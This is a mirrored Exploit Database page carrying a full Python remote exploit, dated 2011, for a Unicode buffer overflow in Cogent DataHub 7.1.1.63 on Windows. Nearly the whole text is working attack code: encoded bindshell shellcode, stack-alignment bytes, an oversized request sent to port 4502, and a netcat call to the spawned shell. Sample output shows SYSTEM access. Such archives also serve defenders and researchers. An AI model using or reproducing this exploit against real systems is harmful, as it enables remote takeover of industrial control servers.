Cogent Datahub 7.1.1.63 – Remote Unicode Buffer Overflow

• Exploit Database
• 110 阅读

• 作者： mr_me
  日期： 2011-09-22
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17884/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113

  #!/usr/bin/python # # Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit # tested on: # - windows server 2003 # - windows XP sp3 # questions >> @net__ninja || @luigi_auriemma # example usage: # [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130 # # ----------------------------------------------------- # ------ Cogent Datahub Unicode Overflow Exploit ------ # ------------- Found by Luigi Auriemma --------------- # --------- SYSTEM exploit by Steven Seeley ----------- # # (+) Sending overflow... # (+) Getting shell.. # Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded! # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami # whoami # nt authority\system # # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>   import socket,time,sys,os   # bindshell on port 1337 shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA" "IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1" "111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK" "2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9" "04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL" "PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV" "M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH" "XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ" "6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO" "8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP" "PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ" "0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ" "XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU" "8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K" "O8VKO8PKZA")   align= "" align += "\x54" # push esp align += "\x6f" align += "\x58" # pop eax align += "\x6f" align += "\x05\x6f\x11" # add eax,11006f00 align += "\x6f" align += "\x2d\x37\x01" # sub eax,01003700 align += "\x6f" align += "\x2d\x37\x10" # sub eax,11003700 align += "\x6f" align += "\x50" # push eax align += "\x6f" align += "\x48" # dec eax align += "\x6f" align += "\x48" # dec eax align += "\x6f" align += "\x55" # push ebp align += "\x6f" align += "\x59" # pop ecx align += "\x08" # add [eax],cl (carve a &apos;RETN&apos; onto the stack) align += "\x6f" align += "\x40" # inc eax align += "\x6f" align += "\x40" # inc eax align += "\x6f\x41" * (48) # inc ecx (will not effect to our payload) align += "\x6f" align += "\x62" # becomes our carved RETN on the stack (0x61+0x62=0xc3)   request = "(domain \"" request += "\x61" * 1019 request += "\x7f\x55" # jmp esp 0x0055007f request += align request += shellcodez request += "\")\r\n"   def banner(): banner = "\n-----------------------------------------------------\n" banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n" banner += "------------- Found by Luigi Auriemma ---------------\n" banner += "--------- SYSTEM exploit by Steven Seeley -----------\n" return banner   if len(sys.argv) < 2: print banner() print "(-) Usage: %s <target addr> " % sys.argv[0] sys.exit(0)   target = sys.argv[1] print banner()   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,4502)) except: print "[-] Connection to %s failed! % (target)" sys.exit(0)   print "(+) Sending overflow..." s.send(request) s.recv(1024) # wait for the target, sheesh. time.sleep(2) print "(+) Getting shell.." os.system("nc -vv %s 1337" % target) s.close()